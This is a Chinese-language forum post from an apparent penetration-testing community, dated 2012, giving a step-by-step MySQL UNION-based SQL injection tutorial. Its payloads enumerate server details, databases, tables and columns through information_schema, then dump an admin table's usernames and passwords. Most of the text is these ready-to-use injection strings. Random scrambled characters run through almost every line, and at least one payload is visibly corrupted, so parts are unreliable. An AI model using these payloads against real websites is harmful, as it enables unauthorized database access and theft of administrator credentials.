中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法% J! r! t2 b& ?3 h& n7 c5 c. G

. x) S$ G  W5 t学习盲注前先了解下 IFORMATION_SCHEMA 库" c7 J: E  e8 P8 C! N
, i( ]4 D  ]& \( b* W- g5 |( C/ I
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有& Q. j2 L3 u2 B, w, J+ I2 Z4 Z% i+ ]
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
0 k* c. R' {3 f9 v0 ]1.得到所有数据库名:; q1 L. \  l3 L3 |- Z- B
|SCHEMATA ->存储数据库名的表. b* J6 ~4 D$ F" i1 G+ H" F8 z' o
|---字段:SCHEMA_NAME ->数据库名称6 h) a* h! r- b& M2 r# X

8 U7 q" E2 b" q% R|TABLES ->存储表名
# Y" w+ K& x" u9 {# y# Z|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名! `+ ?' i$ k! f5 }$ P/ W* A
|---字段:TABLE_NAME ->存储表的表名
; w' _1 F' k* X# f9 G' z- o
% O  I( Q/ i2 r|COLUMNS ->存储的字段名表
$ A8 Y, Y  j: g* ~" w|---字段:TABLE_SCHEMA ->该字段所属数据库名' O0 L$ y: W4 _1 E; g& F. p. {
|---字段:TABLE_NAME ->存储所属表的名称
- a$ ]6 z1 w+ ]: i4 r2 p: J
8 A) G' o$ A0 Z|---字段:COLUMN_NAME ->该字段的名称, ]8 K$ i2 x. Y- _9 M! D" l3 H
9 d3 U9 R: u; n$ {

+ ^( V5 F: F5 \* r
) ]  j, M& C9 v* i###########################################################################
( V/ F: u" j) w$ e$ x' J
$ @# o5 i8 c" H% k- K9 V) W1 r0x001 获取系统信息:
% i0 Y# ^, s$ F- d! z
7 g+ j3 f2 G( j2 g! c2 `union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
% @1 S0 a0 \% M6 Z% ]; z# S9 W, v2 v( V. o2 q' L
/*4 A( X% A, _# y3 ?( W
' c: y: a% X. P& A1 ?
@@global.version_compile_os 获取系统版本
# M/ l: c7 r8 w7 a, K& H/ n; ~) b' Y' J& g; o
@@datadir 数据库路径
7 O% K6 q$ U5 f9 hdatabase() 当前数据库名称) \0 B- \0 A( B, e, l
0x3c62723e 换行HEX值2 Z. n1 W9 o# m; X& H9 p9 y5 ~( y" f
, N" h' r' J: T$ j) j
*/( C% y3 G- u4 S* t
$ m. j# }" d, J0 h, b  S) S

: Z$ Q; v9 D; T- G6 Z$ B. Y* |9 ^8 \/ }+ |+ M( s2 g4 j
######################################################################) I- m, i4 H" Q1 J* @' w7 t4 n
& [/ w. R! A# `* n9 k3 l  \
0x002 获取表名  D$ b2 {, [# h! M3 b0 T

4 ~( K, h3 X: e+ B! d# Q* M, ]union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
: l% \8 T" T8 F* p" z4 L- ?1 u" f1 ^
% p$ t3 c. l. c" s+ |1 o
) C/ O' G: l/ Z& W
/*
" {' U' u! b0 @8 r5 k. ~
7 N; M3 L( U/ f9 t  j8 @& V& {9 e7 F0x67617264656e 为当前数据库名$ j1 V6 Y; A# Y1 i, ]& {0 C

* T" Z/ ?9 \  k1 w  p8 q  e" S! ?group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
* ]' S" P- F: b; A9 m
0 C5 Q2 t1 m2 b0 a*/% V; v6 Z! Z1 Y: d
) p# Q3 w6 U3 i' k2 A% y4 @, D& n! H
######################################################################
9 J* s2 l9 z/ x  V, {2 S- X+ R0 z; D1 E" a$ r* h

1 d  V2 M. g" d3 R/ h8 o
0 V% ]" q. x, a) ?0x003 获取字段+ K7 N7 j+ x. Q, \5 D) `5 X

, D8 H& N5 b/ ^, cunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*$ U8 F7 Q! m9 x  j5 R6 S
- W; m& |0 R/ L8 J
/*4 j: ^3 p% z; a5 {- q& d

+ G- S: p0 D$ p- {group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
5 O' f& Y& ^$ `0 Y1 N( \3 D8 o4 P0 R- y. _7 ~9 M
0x61646d696e ->选择一个表' A1 L0 C3 W" `. `
( f2 `* O, n0 i  R
0x67617264656e ->数据库名1 ]- n4 c8 s' @8 i/ z. Y4 w$ C

# C% T9 Q' B' B' L2 F*/0 G: K+ I9 u8 u; d6 l7 M

2 W& [) x7 @& z#####################################################################
- Y: u, ]* R5 i5 [8 B
1 n; m) |5 u6 ~, e+ Y; L- v; ] # S# Y! r6 ]. f0 q/ K) Q

+ Q5 _- Q" u! B- v0 r2 K0x004 获取数据
/ Z8 i  r+ H' L2 o8 F3 f% }# ?! Z+ g* t4 E8 m# @
union select 1,2,3' ~$ R! S- |1 }" w8 e% N; D, L
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin' d1 Z8 j& `6 y4 k

# m# m) j4 _6 L$ U- Eunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
- E; F/ Q2 }* t* S) Q. ^  L* W4 \, R8 r4 S% r7 ?0 S
$ H3 x' H  P" t3 o$ E
5 K# Z9 z, C( V; U) S
/*1 M: D8 @9 s, e9 \0 a! z

3 ]# R/ M4 j3 M9 P6 P0x3c62723e 换行符号HEX编码5 {+ j: Q3 t, H1 e+ r# V* d$ E
$ s; R  F- @) t; Y+ t
group_concat 同时获得该字段所有数据- l) ?* d, }2 ~0 F' h
! x& `0 g) N9 i9 k
*/
% ]! ?0 J, _$ M- E3 v. Z: Q, @2 Z5 y! A* a2 v! N4 l





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2